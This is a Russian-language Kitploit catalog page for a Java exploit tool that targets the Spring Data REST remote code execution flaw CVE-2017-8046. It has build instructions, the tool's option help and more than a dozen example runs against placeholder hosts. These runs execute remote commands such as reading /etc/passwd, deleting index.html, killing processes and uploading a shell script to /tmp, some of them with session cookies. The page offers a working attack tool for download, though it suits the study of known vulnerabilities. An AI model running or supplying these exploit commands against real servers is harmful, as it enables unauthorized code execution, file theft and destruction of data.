Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
spring-break_cve-2017-8046 — Это Java-программа, эксплуатирующая уязвимость Spring Break (CVE-2017-8046). | Kitploit
Инструменты/GitHubGitHub/m3ssap0/spring-break_cve-2017-8046
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubm3ssap0/spring-break_cve-2017-8046

spring-break_cve-2017-8046

Это Java-программа, эксплуатирующая уязвимость Spring Break (CVE-2017-8046).

Репозиторий
171185 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

spring-break_cve-2017-8046

Это Java-программа, эксплуатирующая уязвимость Spring Break (CVE-2017-8046).

Это программное обеспечение написано так, чтобы иметь как можно меньше внешних зависимостей.

ДИСКЛЕЙМЕР

Этот инструмент предназначен для инженеров по безопасности и специалистов по безопасности приложений для проведения оценок безопасности. Пожалуйста, используйте этот инструмент ответственно. Я не несу ответственности за то, как кто-либо использует это приложение. Я НЕ несу ответственности за любой ущерб, причинённый, или любые преступления, совершённые с использованием этого инструмента.

Информация об уязвимости

  • CVE-ID: CVE-2017-8046
  • Ссылка: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
  • Описание: Вредоносные PATCH-запросы, отправляемые на серверы spring-data-rest в Pivotal Spring Data REST версиях до 2.5.12, 2.6.7, 3.0 RC3, Spring Boot версиях до 2.0.0M4 и в выпусках Spring Data до Kay-RC3, могут использовать специально сформированные JSON-данные для выполнения произвольного Java-кода.
  • Ссылка на производителя: https://pivotal.io/security/cve-2017-8046

Как создать исполняемый JAR-файл

Вот несколько шагов, которые необходимо выполнить, чтобы создать исполняемый JAR-файл со всеми зависимостями, который можно использовать для запуска эксплойта.

с помощью Maven

Можно выполнить следующую команду Maven:

mvn clean compile package

с помощью Eclipse

Можно выполнить следующие шаги:

  1. разрешите все внешние зависимости/библиотеки;
  2. нажмите правой кнопкой мыши на проект Eclipse и перейдите в Run As > Run Configurations;
  3. нажмите правой кнопкой мыши на Java Application, затем на New;
  4. выберите имя и укажите главный класс com.afs.exploit.spring.SpringBreakCve20178046;
  5. нажмите кнопку Apply;
  6. закройте окно и вернитесь в главное окно Eclipse;
  7. нажмите правой кнопкой мыши на проект Eclipse и выберите Export...;
  8. найдите и выберите Runnable JAR file (в ветке Java);
  9. в следующем окне:
    1. выберите правильную Launch configuration, созданную ранее;
    2. выберите Export destination;
    3. выберите опцию Extract required libraries into generated JAR;
    4. нажмите кнопку Finish.

Справка

Usage:
   java -jar spring-break_cve-2017-8046.jar [options]
Description:
   Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046).
Options:
   -h, --help
      Prints this help and exits.
   -u, --url [target_URL]
      The target URL where the exploit will be performed.
      You have to choose an existent resource.
   -cmd, --command [command_to_execute]
      The command that will be executed on the remote machine.
   -U, --upload [file_to_upload]
      File to upload to the remote machine. Will be uploaded to the current working
      directory of the java process. Warning: this will only succeed on a server running
      JRE-1.7 or later.
   --remote-upload-directory [/some/existing/path/]
      Optional. Server will attempt to write the uploaded file to this directory on the
      filesystem. Specified directory must exist and be writeable.
   --cookies [cookies]
      Optional. Cookies passed into the request, e.g. authentication cookies.
   -H, --header [custom_header]
      Optional. Custom header passed into the request, e.g. authorization header.
   -k
      Skip SSL validation
   --clean
      Optional. Removes error messages in output due to the usage of the
      exploit. It could hide error messages if the request fails for other reasons.
   --error-stream
      Optional. In case of errors the command will fail and the error stream will
      not be returned. This option can be used to relaunch the remote command
      returning the error stream.
   -v, --verbose
      Optional. Increase verbosity.

Примеры

java -jar spring-break_cve-2017-8046.jar --url "https://vuln01.foo.com/api/v1/entity/123" --command ipconfig
java -jar spring-break_cve-2017-8046.jar --url "https://vuln02.foo.com/api/v2/entity/42" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
java -jar spring-break_cve-2017-8046.jar -v --url "https://vuln02.foo.com/api/v2/entity/42" --upload file.sh --remote-upload-directory /tmp
java -jar spring-break_cve-2017-8046.jar --url "https://vuln03.foo.com/asd/api/v1/entity/1" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
java -jar spring-break_cve-2017-8046.jar --url "https://vuln04.foo.com/asd/api/v1/entity/1" --command "dir C:\Windows" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln05.foo.com/asd/api/v1/entity/1" --command "copy /b NUL ..\..\pwned.txt" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln06.foo.com/asd/api/v1/entity/1" --command "ping -c 3 www.google.it" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln07.foo.com/asd/api/v1/entity/1" --command "ps aux" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln08.foo.com/asd/api/v1/entity/1" --command "uname -a" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln09.foo.com/asd/api/v1/entity/1" --command "ls -l" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln10.foo.com/asd/api/v1/entity/1" --command "wget https://www.google.com" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln11.foo.com/asd/api/v1/entity/1" --command "rm index.html" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln12.foo.com/asd/api/v1/entity/1" --command "cat /etc/passwd" --clean
java -jar spring-break_cve-2017-8046.jar --url "https://vuln13.foo.com/asd/api/v1/entity/1" --command "kill -9 5638" --clean

Обратите внимание: указанный ресурс/URL должен существовать!

Уязвимое приложение

Уязвимое приложение можно найти здесь.

Авторы

  • Antonio Francesco Sardella - основная реализация - m3ssap0
  • Yassine Tioual - улучшение HTTP-заголовков - nisay759
  • Robin Wagenaar - за предложение использовать операцию patch 'remove' вместо 'replace' и за функциональность загрузки файлов - RobinWagenaar

Лицензия

Этот проект лицензирован в соответствии с Apache License Version 2.0 — подробности см. в файле LICENSE.txt.

Благодарности

  • Man Yue Mo — исследователь безопасности, обнаруживший уязвимость
Скачать инструмент